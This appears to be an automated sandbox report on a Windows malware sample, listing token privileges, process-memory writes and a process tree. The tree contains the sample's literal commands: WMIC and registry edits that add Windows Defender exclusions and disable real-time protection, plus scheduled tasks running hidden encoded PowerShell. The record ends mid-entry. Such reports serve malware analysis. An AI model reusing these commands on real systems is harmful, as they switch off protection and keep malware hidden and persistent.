Token: SeLoadDriverPrivilege	2676	WMIC.exe
Token: SeSystemProfilePrivilege	2676	WMIC.exe
Token: SeSystemtimePrivilege	2676	WMIC.exe
Token: SeProfSingleProcessPrivilege	2676	WMIC.exe
Token: SeIncBasePriorityPrivilege	2676	WMIC.exe
Token: SeCreatePagefilePrivilege	2676	WMIC.exe
Token: SeBackupPrivilege	2676	WMIC.exe
Token: SeRestorePrivilege	2676	WMIC.exe
Token: SeShutdownPrivilege	2676	WMIC.exe
Token: SeDebugPrivilege	2676	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2676	WMIC.exe
Token: SeRemoteShutdownPrivilege	2676	WMIC.exe
Token: SeUndockPrivilege	2676	WMIC.exe
Token: SeManageVolumePrivilege	2676	WMIC.exe
Token: 33	2676	WMIC.exe
Token: 34	2676	WMIC.exe
Token: 35	2676	WMIC.exe
Token: SeDebugPrivilege	2284	powershell.EXE
Token: SeDebugPrivilege	2028	powershell.EXE
Token: SeDebugPrivilege	1760	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2136	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2136	WMIC.exe
Token: SeSecurityPrivilege	2136	WMIC.exe
Token: SeTakeOwnershipPrivilege	2136	WMIC.exe
Token: SeLoadDriverPrivilege	2136	WMIC.exe
Token: SeSystemtimePrivilege	2136	WMIC.exe
Token: SeBackupPrivilege	2136	WMIC.exe
Token: SeRestorePrivilege	2136	WMIC.exe
Token: SeShutdownPrivilege	2136	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2136	WMIC.exe
Token: SeUndockPrivilege	2136	WMIC.exe
Token: SeManageVolumePrivilege	2136	WMIC.exe
Token: SeDebugPrivilege	1916	powershell.EXE
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2860	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2860	WMIC.exe
Token: SeSecurityPrivilege	2860	WMIC.exe
Token: SeTakeOwnershipPrivilege	2860	WMIC.exe
Token: SeLoadDriverPrivilege	2860	WMIC.exe
Token: SeSystemtimePrivilege	2860	WMIC.exe
Token: SeBackupPrivilege	2860	WMIC.exe
Token: SeRestorePrivilege	2860	WMIC.exe
Token: SeShutdownPrivilege	2860	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2860	WMIC.exe
Token: SeUndockPrivilege	2860	WMIC.exe
Token: SeManageVolumePrivilege	2860	WMIC.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1056	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1056	WMIC.exe
Token: SeSecurityPrivilege	1056	WMIC.exe
Token: SeTakeOwnershipPrivilege	1056	WMIC.exe
Token: SeLoadDriverPrivilege	1056	WMIC.exe
Token: SeSystemtimePrivilege	1056	WMIC.exe
Token: SeBackupPrivilege	1056	WMIC.exe
Token: SeRestorePrivilege	1056	WMIC.exe
Token: SeShutdownPrivilege	1056	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1056	WMIC.exe
Token: SeUndockPrivilege	1056	WMIC.exe
Token: SeManageVolumePrivilege	1056	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

49c60debd7513ca11d1620fb7b298e491717a78a88fece9833eadca08fa20a7a.exeInstall.exeforfiles.execmd.exepowershell.exetaskeng.exehoytHDx.exetaskeng.exepowershell.EXE

description	pid	process	target process
PID 3000 wrote to memory of 2940	3000	49c60debd7513ca11d1620fb7b298e491717a78a88fece9833eadca08fa20a7a.exe	Install.exe
PID 3000 wrote to memory of 2940	3000	49c60debd7513ca11d1620fb7b298e491717a78a88fece9833eadca08fa20a7a.exe	Install.exe
PID 3000 wrote to memory of 2940	3000	49c60debd7513ca11d1620fb7b298e491717a78a88fece9833eadca08fa20a7a.exe	Install.exe
PID 3000 wrote to memory of 2940	3000	49c60debd7513ca11d1620fb7b298e491717a78a88fece9833eadca08fa20a7a.exe	Install.exe
PID 3000 wrote to memory of 2940	3000	49c60debd7513ca11d1620fb7b298e491717a78a88fece9833eadca08fa20a7a.exe	Install.exe
PID 3000 wrote to memory of 2940	3000	49c60debd7513ca11d1620fb7b298e491717a78a88fece9833eadca08fa20a7a.exe	Install.exe
PID 3000 wrote to memory of 2940	3000	49c60debd7513ca11d1620fb7b298e491717a78a88fece9833eadca08fa20a7a.exe	Install.exe
PID 2940 wrote to memory of 2836	2940	Install.exe	forfiles.exe
PID 2940 wrote to memory of 2836	2940	Install.exe	forfiles.exe
PID 2940 wrote to memory of 2836	2940	Install.exe	forfiles.exe
PID 2940 wrote to memory of 2836	2940	Install.exe	forfiles.exe
PID 2940 wrote to memory of 2836	2940	Install.exe	forfiles.exe
PID 2940 wrote to memory of 2836	2940	Install.exe	forfiles.exe
PID 2940 wrote to memory of 2836	2940	Install.exe	forfiles.exe
PID 2836 wrote to memory of 2464	2836	forfiles.exe	cmd.exe
PID 2836 wrote to memory of 2464	2836	forfiles.exe	cmd.exe
PID 2836 wrote to memory of 2464	2836	forfiles.exe	cmd.exe
PID 2836 wrote to memory of 2464	2836	forfiles.exe	cmd.exe
PID 2836 wrote to memory of 2464	2836	forfiles.exe	cmd.exe
PID 2836 wrote to memory of 2464	2836	forfiles.exe	cmd.exe
PID 2836 wrote to memory of 2464	2836	forfiles.exe	cmd.exe
PID 2464 wrote to memory of 3016	2464	cmd.exe	powershell.exe
PID 2464 wrote to memory of 3016	2464	cmd.exe	powershell.exe
PID 2464 wrote to memory of 3016	2464	cmd.exe	powershell.exe
PID 2464 wrote to memory of 3016	2464	cmd.exe	powershell.exe
PID 2464 wrote to memory of 3016	2464	cmd.exe	powershell.exe
PID 2464 wrote to memory of 3016	2464	cmd.exe	powershell.exe
PID 2464 wrote to memory of 3016	2464	cmd.exe	powershell.exe
PID 3016 wrote to memory of 2676	3016	powershell.exe	WMIC.exe
PID 3016 wrote to memory of 2676	3016	powershell.exe	WMIC.exe
PID 3016 wrote to memory of 2676	3016	powershell.exe	WMIC.exe
PID 3016 wrote to memory of 2676	3016	powershell.exe	WMIC.exe
PID 3016 wrote to memory of 2676	3016	powershell.exe	WMIC.exe
PID 3016 wrote to memory of 2676	3016	powershell.exe	WMIC.exe
PID 3016 wrote to memory of 2676	3016	powershell.exe	WMIC.exe
PID 2940 wrote to memory of 2516	2940	Install.exe	schtasks.exe
PID 2940 wrote to memory of 2516	2940	Install.exe	schtasks.exe
PID 2940 wrote to memory of 2516	2940	Install.exe	schtasks.exe
PID 2940 wrote to memory of 2516	2940	Install.exe	schtasks.exe
PID 2940 wrote to memory of 2516	2940	Install.exe	schtasks.exe
PID 2940 wrote to memory of 2516	2940	Install.exe	schtasks.exe
PID 2940 wrote to memory of 2516	2940	Install.exe	schtasks.exe
PID 888 wrote to memory of 560	888	taskeng.exe	hoytHDx.exe
PID 888 wrote to memory of 560	888	taskeng.exe	hoytHDx.exe
PID 888 wrote to memory of 560	888	taskeng.exe	hoytHDx.exe
PID 888 wrote to memory of 560	888	taskeng.exe	hoytHDx.exe
PID 560 wrote to memory of 2444	560	hoytHDx.exe	schtasks.exe
PID 560 wrote to memory of 2444	560	hoytHDx.exe	schtasks.exe
PID 560 wrote to memory of 2444	560	hoytHDx.exe	schtasks.exe
PID 560 wrote to memory of 2444	560	hoytHDx.exe	schtasks.exe
PID 560 wrote to memory of 1052	560	hoytHDx.exe	schtasks.exe
PID 560 wrote to memory of 1052	560	hoytHDx.exe	schtasks.exe
PID 560 wrote to memory of 1052	560	hoytHDx.exe	schtasks.exe
PID 560 wrote to memory of 1052	560	hoytHDx.exe	schtasks.exe
PID 1700 wrote to memory of 2284	1700	taskeng.exe	powershell.EXE
PID 1700 wrote to memory of 2284	1700	taskeng.exe	powershell.EXE
PID 1700 wrote to memory of 2284	1700	taskeng.exe	powershell.EXE
PID 2284 wrote to memory of 3064	2284	powershell.EXE	gpupdate.exe
PID 2284 wrote to memory of 3064	2284	powershell.EXE	gpupdate.exe
PID 2284 wrote to memory of 3064	2284	powershell.EXE	gpupdate.exe
PID 560 wrote to memory of 856	560	hoytHDx.exe	schtasks.exe
PID 560 wrote to memory of 856	560	hoytHDx.exe	schtasks.exe
PID 560 wrote to memory of 856	560	hoytHDx.exe	schtasks.exe
PID 560 wrote to memory of 856	560	hoytHDx.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\49c60debd7513ca11d1620fb7b298e491717a78a88fece9833eadca08fa20a7a.exe
"C:\Users\Admin\AppData\Local\Temp\49c60debd7513ca11d1620fb7b298e491717a78a88fece9833eadca08fa20a7a.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3000

C:\Users\Admin\AppData\Local\Temp\7zSFC9.tmp\Install.exe
.\Install.exe /udidsSJaq "525403" /S
2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2940

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
3⤵
- Suspicious use of WriteProcessMemory
PID:2836

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
4⤵
- Suspicious use of WriteProcessMemory
PID:2464

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3016

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2676

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bwrroZoeZRoQVpyAcj" /SC once /ST 02:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\hoytHDx.exe\" ZO /Snsite_idfex 525403 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2516

C:\Windows\system32\taskeng.exe
taskeng.exe {007C4668-CD07-4C28-BB6F-18D406306345} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Suspicious use of WriteProcessMemory
PID:888

C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\hoytHDx.exe
C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\hoytHDx.exe ZO /Snsite_idfex 525403 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:560

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gTXPhRHrY" /SC once /ST 00:00:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:2444

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gTXPhRHrY"
3⤵
PID:1052

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gTXPhRHrY"
3⤵
PID:856

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
PID:932

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:452

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:1156

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2404

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "goiXrkDlM" /SC once /ST 01:12:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1664

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "goiXrkDlM"
3⤵
PID:1796

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "goiXrkDlM"
3⤵
PID:2368

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
3⤵
PID:1280

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
4⤵
PID:1636

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2136

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2624

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2568

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2512

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2832

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2276

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3016

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2464

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2708

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\heXdjphsLYtTYYrU\BoaOvBAI\CNQBNNnCPqjxcQtS.wsf"
3⤵
PID:2088

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\heXdjphsLYtTYYrU\BoaOvBAI\CNQBNNnCPqjxcQtS.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:2620

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2164

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2528

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2140

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1892

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2772

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2804

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2936

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1988

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1844

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1996

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2748

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1660

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1856

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2752

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2860

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2864

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2160

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2392

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:804

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2440

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2384

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2292

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2144

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1924

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:932

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2404

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2020

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3048

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2944

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2224

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1644

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:32
4⤵
PID:276

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1876

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1100

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1416

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gPDyCjTyq" /SC once /ST 01:17:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:904

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gPDyCjTyq"
3⤵
PID:2328

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gPDyCjTyq"
3⤵
PID:2996

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
3⤵
PID:2036

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
4⤵
PID:2928

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
3⤵
PID:2532

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
4⤵
PID:2784

C:\Windows\SysWOW64\schtasks.exe
